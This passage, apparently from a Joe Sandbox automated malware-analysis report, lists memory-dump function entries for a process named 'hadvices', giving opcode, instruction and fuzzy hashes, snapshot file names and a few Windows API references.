                                                      • Instruction Fuzzy Hash: 52B14F703056018FEF199B2DC96CB39BAAAEF85740F1940AAE512CF3B1EA25CC41C753
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hq$Hq
                                                      • API String ID: 0-925789375
                                                      • Opcode ID: defdc2d18c909df930d097a815f910c6b2eeec7221fa8e2b3f62e1cbdbd3ff08
                                                      • Instruction ID: 3606aeb7dffb07aeb0ae1ad25b85bd1c24930686768b747887c561957ccd8b41
                                                      • Opcode Fuzzy Hash: defdc2d18c909df930d097a815f910c6b2eeec7221fa8e2b3f62e1cbdbd3ff08
                                                      • Instruction Fuzzy Hash: 6091BF317002058FDF199F28D958B6EBBE2BF88214F148468E946CB395DB34DC42CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,q$,q
                                                      • API String ID: 0-1667412543
                                                      • Opcode ID: fe311769aed72c2c9a99d6adc8c6cf38126497cf41de6871d38b229582dfff77
                                                      • Instruction ID: 459e0bfa9db92b3a6d1e886f7074e5e13c18155080bc61a4dc55c65211fcb712
                                                      • Opcode Fuzzy Hash: fe311769aed72c2c9a99d6adc8c6cf38126497cf41de6871d38b229582dfff77
                                                      • Instruction Fuzzy Hash: C3818E34B005058FDF14CF6DC888A6AFBB2BF89214F5489A9D516DB365DB31EC42CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q$4'q
                                                      • API String ID: 0-1467158625
                                                      • Opcode ID: fc100348c2b4271fbda00bbb70a07c0b4e004d226a1922b8ad4a4418907952bb
                                                      • Instruction ID: 08093a321e855062be6227bb7441ee757ad10856e31fa355befed2c4dec16c5b
                                                      • Opcode Fuzzy Hash: fc100348c2b4271fbda00bbb70a07c0b4e004d226a1922b8ad4a4418907952bb
                                                      • Instruction Fuzzy Hash: 925180307012159FDF05DF69C884B6BBBEAEF88364F188065EA08CB255EB71CD41CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xq$Xq
                                                      • API String ID: 0-1556399337
                                                      • Opcode ID: fa388fed81b98a9cd9c96b6f8d2e46773a94f3e9c071e22ffad4f6a62adf2aa9
                                                      • Instruction ID: a3ee0e61738b7a82245b81539e46c55b568c6c75c92a45dee6701035ed15d1e6
                                                      • Opcode Fuzzy Hash: fa388fed81b98a9cd9c96b6f8d2e46773a94f3e9c071e22ffad4f6a62adf2aa9
                                                      • Instruction Fuzzy Hash: 3531D835B003258BEF2D56B9599427EE6E6BBC4211F28403DD917C3384DF75CC45A7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4492e08b698534dfe36f68ee6f0699d050a35dccef1d3932e43664e36d393259
                                                      • Instruction ID: 85108d59b93476b7182213173ed39b904e2c67584217986474d736cf5175d8ca
                                                      • Opcode Fuzzy Hash: 4492e08b698534dfe36f68ee6f0699d050a35dccef1d3932e43664e36d393259
                                                      • Instruction Fuzzy Hash: 06917A71A007058FE724DF2AD86475ABBFAFF88200F04892DD54AD7B40DB75E946CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRq
                                                      • API String ID: 0-3187445251
                                                      • Opcode ID: b40c588d25c0d2075f64f5cf5ee103b62efcafe3fca07b0ee70e82e721af0642
                                                      • Instruction ID: dc0a5fea00ad7a743b02ab4c38baeee87667e832a62ffa269c5609dfa0c458d5
                                                      • Opcode Fuzzy Hash: b40c588d25c0d2075f64f5cf5ee103b62efcafe3fca07b0ee70e82e721af0642
                                                      • Instruction Fuzzy Hash: 5522F974A00219CFCB64EF65E984ADDBBB2FF48302F1081A5D819A7358DB346E86CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRq
                                                      • API String ID: 0-3187445251
                                                      • Opcode ID: dc105fa6f818e2b5e7167abda8036b96ecf0846daabb097400149f0ada8db4bc
                                                      • Instruction ID: cf8350298d1ce0545c44e74420839abccf5779d68a5265fab22807473b6107f5
                                                      • Opcode Fuzzy Hash: dc105fa6f818e2b5e7167abda8036b96ecf0846daabb097400149f0ada8db4bc
                                                      • Instruction Fuzzy Hash: 1622F974A00219CFCB64EF65E984ADDBBB2FF48302F1081A5D819A7358DB346E86CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 016623E2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: db9a2c67e2998bd8bf4e1bf7bd8f16d1acf369bfef31fa88207d12f2eac59519
                                                      • Instruction ID: d7f7b9168aa25621602b86d3b428215820de1977c9e4ab2c78dfb8de164204f5
                                                      • Opcode Fuzzy Hash: db9a2c67e2998bd8bf4e1bf7bd8f16d1acf369bfef31fa88207d12f2eac59519
                                                      • Instruction Fuzzy Hash: 931103B6D003499FDB24DF9AD844A9EFBF8EB48310F10842EE919A7300C775A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 016623E2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 42836cb2fd9f9038fa04f9c3109c92fd082eaac47931a26f897ec92db33c404d
                                                      • Instruction ID: 76d4b3e33b0e897505568ab8ce68cc4c696d2cd2c119205faeb658ec10cc548d
                                                      • Opcode Fuzzy Hash: 42836cb2fd9f9038fa04f9c3109c92fd082eaac47931a26f897ec92db33c404d
                                                      • Instruction Fuzzy Hash: 7D1100B6D003498FDB24CF9AD845ADEFBF4EB88310F10842ED919A7200C379A945CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 01666205
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 5788bdf62aa8e05643d1c2bc43295367cc73e61ade7207b17dd64181e7b3d0bd
                                                      • Instruction ID: 45bd44b4a6db930bd4283068adc64cb915b9cdfb922d3bf9dc67dabaadd341fc
                                                      • Opcode Fuzzy Hash: 5788bdf62aa8e05643d1c2bc43295367cc73e61ade7207b17dd64181e7b3d0bd
                                                      • Instruction Fuzzy Hash: 991100B5C003488FDB20DF9AE845BDEFBF8EB48324F20841AD559A7210C379A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,016666EF), ref: 016674ED
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: DispatchMessage
                                                      • String ID:
                                                      • API String ID: 2061451462-0
                                                      • Opcode ID: 94aafb03a8aebe5ad6a8c16ee7b0680d84aec697639ca61b58be4f4cbe920ac1
                                                      • Instruction ID: 1ef6cee5ddf2f669611e954fa529a5f459564365b187f8a2d3342afd423b8978
                                                      • Opcode Fuzzy Hash: 94aafb03a8aebe5ad6a8c16ee7b0680d84aec697639ca61b58be4f4cbe920ac1
                                                      • Instruction Fuzzy Hash: C811F2B5C047499FDB20DF9AE844B9EFBF8EB48324F10842AD519A3310D378A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 01666205
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: b155e41ea6274572f8d7b125ac1380ad490afd40c7b4388eeed7f4accbc8f302
                                                      • Instruction ID: bf4d1e1f313c210f3d5caabfcdbb05a7e5cc4adf1a78570914c546738f196e5f
                                                      • Opcode Fuzzy Hash: b155e41ea6274572f8d7b125ac1380ad490afd40c7b4388eeed7f4accbc8f302
                                                      • Instruction Fuzzy Hash: B01115B5C043498FDB20DF9AD945B9EFBF8EB48324F10841AD519A7300D379A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,016666EF), ref: 016674ED
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: DispatchMessage
                                                      • String ID:
                                                      • API String ID: 2061451462-0
                                                      • Opcode ID: b2950a151285781b2b0b5c8b4f6e54f7b77fc24170744fa0f6a2b6db2bd898ad
                                                      • Instruction ID: 6213bf4215cfff936f72158fdfe64b1dc3f0140781613da307d12a1ccd0ddc24
                                                      • Opcode Fuzzy Hash: b2950a151285781b2b0b5c8b4f6e54f7b77fc24170744fa0f6a2b6db2bd898ad
                                                      • Instruction Fuzzy Hash: 2211F2B5C047499FDB20DF9AE844B9EFBF4EB48324F10846AD918A3210D379A544CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq
                                                      • API String ID: 0-1999159160
                                                      • Opcode ID: 9963f85f3a43db37a15016fe66276d2abfaafd48bdead670e92c15d5bcd557fb
                                                      • Instruction ID: 0beeebe6b7b0124769844baad803b3c43d1db847889d40ecd19d6384d47df953
                                                      • Opcode Fuzzy Hash: 9963f85f3a43db37a15016fe66276d2abfaafd48bdead670e92c15d5bcd557fb
                                                      • Instruction Fuzzy Hash: 0F41C1357002049FDB19AB79D9546AEBBF6FFCC210F184069E916D7395DE319C02CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a293db408c64090b8142f0edbb85ff0c773ef512c5a29fe63111005ac7b471a
                                                      • Instruction ID: 3e2b53237eb6ef813f4e379bf8f38df0eedce7951a4dbe8a2377b73a97a57128
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_172d000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                      • Instruction ID: d03d551c6d5781b24451c6b020d0e6b088bc94f8bf72f50a72eb1c2bf7018ad6
                                                      • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                      • Instruction Fuzzy Hash: F611BB75504284CFCB26CF54C9C4B15FBA2FB84324F24C6A9D8494B6A2C33AD84BCF62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 845c457121b97110efc995216ffa346793be9be6b5b4f918438a8455eef0ee04
                                                      • Instruction ID: f555332a14422d03696b194fb63765f1756fe7d4672309d789a23995c935b69d
                                                      • Opcode Fuzzy Hash: 845c457121b97110efc995216ffa346793be9be6b5b4f918438a8455eef0ee04
                                                      • Instruction Fuzzy Hash: F501F572B012056FCF06DF68A8046EE7FA7DFCC651B14806AF508DB289CA3199528BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d488a6bd71fb32f46fbffa36a173b8739202807ad596df0e63e17c8fb112c87f
                                                      • Instruction ID: f81e6c0ca165af27818561eac49b5d72321b0a8d23b99f10c02c0c6900f9a296
                                                      • Opcode Fuzzy Hash: d488a6bd71fb32f46fbffa36a173b8739202807ad596df0e63e17c8fb112c87f
                                                      • Instruction Fuzzy Hash: 1D012175A042199EEF04DAA8D844FFFF7A9EB98324F048465E601D7245D535D9418BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f08218b1655595dd9a1a53d01c5088eb2d822676f99a891ad8106da9b09309d
                                                      • Instruction ID: b1c5bb5151150f11e2c859849b12274bbc4fdec36616ca5d546d80b89994a2fc
                                                      • Opcode Fuzzy Hash: 7f08218b1655595dd9a1a53d01c5088eb2d822676f99a891ad8106da9b09309d
                                                      • Instruction Fuzzy Hash: 83E08632D2022953C710A7B5DC067EEBB78EF85222F558632D41076144EB71665982A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43cd1e7eafbd68698ec8abdfc175369a15f04ccf13494186c30635c7e49565eb
                                                      • Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
                                                      • Opcode Fuzzy Hash: 43cd1e7eafbd68698ec8abdfc175369a15f04ccf13494186c30635c7e49565eb
                                                      • Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                      • Instruction ID: a6c414d595d3d9bb6e77fb0040a0f376d4cbf24b87457c2d0d78963b0da852a4
                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                      • Instruction Fuzzy Hash: 0FC0127320C1282AAB25508EBC48AA7FA8CC2C22B5F210177F91CA3302A8429C8001B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adb8869b5e4a869361567753feeb61589a631bb9453be03bfb6e94488fe0e5a8
                                                      • Instruction ID: e0fc6fd7c2b19dfd202ccd13835dcaee5ffb6c1a137dbbad473fbf0cadbc5ed3
                                                      • Opcode Fuzzy Hash: adb8869b5e4a869361567753feeb61589a631bb9453be03bfb6e94488fe0e5a8
                                                      • Instruction Fuzzy Hash: 59D0677AB010089FCB049F98E8409DDB7B6FF9C221B448116E915A3265C6319961DB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 02bfd98894d97e58700f6c8d726e7f7ca47d172a904067bf4395cc6151ef33b2
                                                      • Instruction ID: 5ac4076a8ee30256011be140b1f299ac63b172142efd7b0c0f844fde4b007d33
                                                      • Opcode Fuzzy Hash: 02bfd98894d97e58700f6c8d726e7f7ca47d172a904067bf4395cc6151ef33b2
                                                      • Instruction Fuzzy Hash: 6AD02B709083468FD712F731E9041143F39BA80105BC084A1E8144D45FFE7D2C498762
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1aefecec8e26e882258abcac186bf9cb86a19dd7bfb53c15d39d609b2c4a4e67
                                                      • Instruction ID: c968dcda1a2a9f464a0fbc11de4c43c65bbae48d166d1e953f1c3e1870b837c6
                                                      • Opcode Fuzzy Hash: 1aefecec8e26e882258abcac186bf9cb86a19dd7bfb53c15d39d609b2c4a4e67
                                                      • Instruction Fuzzy Hash: B5D04275E0410DCBCF24EFA5E9545DCBBB0EF4C222F24546AD925A3211D73055558F51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43a133960ebd97f0e89b0f6df516a3a8bce803568fcf382bc1e6cb52790d0368
                                                      • Instruction ID: 3db7a243403187c0056973f86584c5b0644551c58dfd8fff5a465d83f3ed8e65
                                                      • Opcode Fuzzy Hash: 43a133960ebd97f0e89b0f6df516a3a8bce803568fcf382bc1e6cb52790d0368
                                                      • Instruction Fuzzy Hash: 2AC0127450030A8BD615F776EA44555772ABAC0102F408510A0190955DDE787D8956A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq
                                                      • API String ID: 0-2938103587
                                                      • Opcode ID: 7c18e751eb2385262aa0bc5c0dae988395300b394bb3bc2373395a6856c8f68c
                                                      • Instruction ID: 2d9c4369d4a8bbccf08cedc899673625cff4d86056ac1409bcbe7d6e0a1c10a9
                                                      • Opcode Fuzzy Hash: 7c18e751eb2385262aa0bc5c0dae988395300b394bb3bc2373395a6856c8f68c
                                                      • Instruction Fuzzy Hash: B7128D74A01228CFCB64DF65C994B99BBB2FF89301F1085E9D909A7364DB35AE81CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ee389a463e129b5d15c9eb87459633bbab6a05ff605d0950622be66f1a8554f
                                                      • Instruction ID: d73efeb387e7b4d37b9587f6cab8cf94f1eb036d81e69394bce20b91a34c5119
                                                      • Opcode Fuzzy Hash: 3ee389a463e129b5d15c9eb87459633bbab6a05ff605d0950622be66f1a8554f
                                                      • Instruction Fuzzy Hash: 72529A74E01228CFEB64DF69C984BDDBBB2BB89301F1081EAD409A7254DB359E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c618b8ae3bd3f48440437819cfe4bd4038d120acda945283e7c2b261f8eedec
                                                      • Instruction ID: 6a7816472d93098d71a61208b769b1e6bd43c7d53219baf8b22541f5f763e720
                                                      • Opcode Fuzzy Hash: 1c618b8ae3bd3f48440437819cfe4bd4038d120acda945283e7c2b261f8eedec
                                                      • Instruction Fuzzy Hash: 8AA17F78A00218CFDB64DF69C894B99BBB1FF49311F1181D9E949AB361DB30AE91CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b77e1560883884c7d3e5229564678877486d69ed63cca4a57036a95b76e51f62
                                                      • Instruction ID: e05cb7824879bed9c51ec3ceaf5c1f693ab85d6e383dc4e34b5ec8cde77da852
                                                      • Opcode Fuzzy Hash: b77e1560883884c7d3e5229564678877486d69ed63cca4a57036a95b76e51f62
                                                      • Instruction Fuzzy Hash: C9A16B74A01228CFDB69DF68C994BE9BBB2BF4A301F1085E9D409A7254DB319EC1CF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f9ad9a72b55e3e1a2fd2574fcc818537623fe955e7f88574dd2eebf29e8a2cd
                                                      • Instruction ID: f75c88d547ccad0bf3499ece1da698d2e2cdafaee7098e297d06e594e98bdd64
                                                      • Opcode Fuzzy Hash: 7f9ad9a72b55e3e1a2fd2574fcc818537623fe955e7f88574dd2eebf29e8a2cd
                                                      • Instruction Fuzzy Hash: E4518F74A01228CFCB69DF24C954BE9BBB2BF4A301F5095E9D40AA7354DB319E81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;q$\;q$\;q$\;q
                                                      • API String ID: 0-2933265366
                                                      • Opcode ID: 800f130cf609ae8e5de83127ce81e0fafdf4f60535ec03bebcbb2ef243da9d27
                                                      • Instruction ID: c8ef5be054be2ef185d5b7e34736cb9ef5e0b2ff6d296cc6748ba3b4ecd183cb
                                                      • Opcode Fuzzy Hash: 800f130cf609ae8e5de83127ce81e0fafdf4f60535ec03bebcbb2ef243da9d27
                                                      • Instruction Fuzzy Hash: A10184317009148FEF259A2DE448A25F7E7AF88664F2941B9F906CB36BDA31DC418790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%